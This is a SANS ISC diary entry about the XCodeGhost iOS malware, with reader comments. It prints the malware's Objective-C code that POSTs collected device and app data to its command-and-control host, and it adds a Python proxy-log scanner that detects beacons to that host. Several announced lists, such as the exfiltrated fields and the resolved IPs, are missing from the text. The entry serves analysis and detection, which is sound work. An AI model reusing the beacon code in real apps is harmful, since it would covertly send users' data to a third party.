End of last week, Palo Alto Networks published information about the "XCodeGhost" malware. Johannes already talked about it in today's podcast episode, but I searched for more details about this story. Apple is known to be very strict with its application validation process: every time a developer submits a new (or an updated) app, it must pass multiple security checks. Why did so many applications infected by XCodeGhost successfully pass them? Could we imagine that Apple extends some kind of trust to reputed developers or popular applications? Until now, ~50 applications have been reported as infected, mainly used in China, but some are popular worldwide, like WeChat. The XCodeGhost source code has been published by its author on GitHub, and a quick analysis shows that the collected information is sent to a single URL via an HTTP POST request:

NSURL *url = [NSURL URLWithString:@"http://init.icloud-analysis.com"];
NSMutableURLRequest *request = [NSMutableURLRequest requestWithURL:url cachePolicy:NSURLRequestReloadIgnoringCacheData timeoutInterval:30];
[request setHTTPMethod:@"POST"];
// concatenatedData holds the collected device and app details built earlier in the source
[request setValue:[NSString stringWithFormat:@"%lu", (unsigned long)[concatenatedData length]] forHTTPHeaderField:@"Content-Length"];
[request setHTTPBody:concatenatedData];

The following information is sent to the server:
The FQDN init.icloud-analysis.com no longer resolves, but it used to resolve to the following IP addresses (from VirusTotal passive DNS):
How to detect infected devices? If you're an iPhone user:
If you're a developer:
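As a network-side complement to the device and developer checks above, here is an added example (not from the diary or the malware source) that scans HTTP proxy logs for beacons to the C2 host quoted above, init.icloud-analysis.com. The log lines and the six-field log format (epoch, client, method, URL, status, bytes) are constructed for the example; a status of 000 stands for a connection that never completed, which is what you see now that the domain no longer resolves.

```python
"""Flag clients whose proxy logs show XCodeGhost beacons (added example)."""
from collections import defaultdict
from urllib.parse import urlsplit

# Only indicator taken from the diary; Palo Alto Networks lists further domains.
XCODEGHOST_C2_HOSTS = {"init.icloud-analysis.com"}

def host_matches(host):
    """True when host is a C2 host or a subdomain of one (case-insensitive).
    A suffix-only match would also catch look-alikes such as xinit.<c2>, so
    the comparison requires an exact name or a dot boundary."""
    host = host.lower().rstrip(".")
    return any(host == c2 or host.endswith("." + c2) for c2 in XCODEGHOST_C2_HOSTS)

def parse_line(line):
    """Parse one constructed proxy line into a dict, or None if malformed."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, client, method, url, status, nbytes = parts
    host = urlsplit(url).hostname or ""  # strips scheme, port and path
    return {"ts": ts, "client": client, "method": method,
            "host": host, "status": status, "bytes": nbytes}

def find_beacons(log_text):
    """Group matching requests by client so every affected device is listed,
    including failed attempts (the beacon is still evidence of infection)."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and host_matches(rec["host"]):
            hits[rec["client"]].append(rec)
    return dict(hits)

# Constructed sample log, not a real capture.
SAMPLE_LOGS = """\
1442822400 10.0.0.12 POST http://init.icloud-analysis.com/ 200 512
1442822401 10.0.0.12 GET http://www.apple.com/ 200 10240
1442822402 10.0.0.45 POST http://INIT.ICLOUD-ANALYSIS.COM:80/ 000 512
1442822403 10.0.0.77 GET http://icloud-analysis.com.example.net/ 200 100
1442822404 10.0.0.90 POST http://xinit.icloud-analysis.com/ 200 512
"""

if __name__ == "__main__":
    for client, recs in sorted(find_beacons(SAMPLE_LOGS).items()):
        print(client, [(r["ts"], r["method"], r["status"]) for r in recs])
```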
Xavier Mertens (Xme), ISC Handler, Sep 21st 2015
Comment: The Palo Alto Networks information on this lists 3 domains.
Anonymous, Sep 24th 2015
Comment: Here is ZDNet's list of top 25 infected apps.
http://www.zdnet.com/article/here-are-the-top-25-ios-apps-infected-with-malware-by-xcodeghost/#ftag=RSSbaffb68
PW, Sep 25th 2015